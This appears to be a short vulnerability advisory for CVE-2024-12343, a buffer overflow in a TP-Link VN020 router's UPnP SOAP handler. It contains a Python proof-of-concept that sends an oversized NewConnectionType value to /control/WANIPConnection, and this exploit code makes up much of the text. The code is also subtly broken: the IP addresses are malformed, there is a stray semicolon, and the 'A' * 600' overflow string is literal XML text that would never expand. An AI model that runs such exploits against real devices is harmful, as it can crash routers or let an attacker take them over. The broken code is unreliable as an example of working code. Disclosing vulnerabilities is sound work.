A critical vulnerability (CVE-2024-12343) has been discovered in the TP-Link VN020 F3v(T) TT_V6.2.1021 firmware, which potentially allows attackers to exploit a buffer overflow in an unknown function within the /control/WANIPConnection file. This particular vulnerability lies in the SOAP Request Handler component and is triggered through the manipulation of the argument NewConnectionType. While the attack must be conducted within the local network, the exploit has already been publicly disclosed, making it a possible target for attackers.

Code Snippet

The following code snippet demonstrates the manipulation of the NewConnectionType argument, which leads to the buffer overflow vulnerability:

import requests

target_IP = "http://192.168..1";           # Replace with the target's IP address
URL = f"{target_IP}/control/WANIPConnection"

headers = {
    "Content-Type": "text/xml",
    "SOAPAction": "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
}

payload = '''<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">;
  <SOAP-ENV:Body>
    <m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">
      <NewRemoteHost></NewRemoteHost>
      <NewExternalPort>808</NewExternalPort>
      <NewProtocol>TCP</NewProtocol>
      <NewInternalPort>80</NewInternalPort>
      <NewInternalClient>192.168..2</NewInternalClient>
      <NewEnabled>1</NewEnabled>
      <NewPortMappingDescription>test</NewPortMappingDescription>
      <NewLeaseDuration></NewLeaseDuration>
      <NewConnectionType>A' * 600</NewConnectionType>     # Creating an oversized payload
    </m:AddPortMapping>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>'''

response = requests.post(URL, headers=headers, data=payload)
print(response.text)

Original References

1. CVE-2024-12343 - National Vulnerability Database
2. TP-Link VN020-F3v(T) TT_V6.2.1021 - 'NewConnectionType' Buffer Overflow - Exploit Database

Exploit Details

An attacker must be within the local network to exploit this vulnerability. By manipulating the 'NewConnectionType' argument, an attacker can cause a buffer overflow in the affected TP-Link device. This can lead to a Denial of Service (DoS) attack, making the router unresponsive, or could potentially result in the execution of arbitrary code on the router, granting an attacker full control of the device.

TP-Link is advised to release a firmware update that addresses this vulnerability and users are advised to update their devices' firmware as soon as the patch becomes available.

Timeline

Published on: 12/08/2024 10:15:04 UTC
Last modified on: 12/10/2024 23:26:52 UTC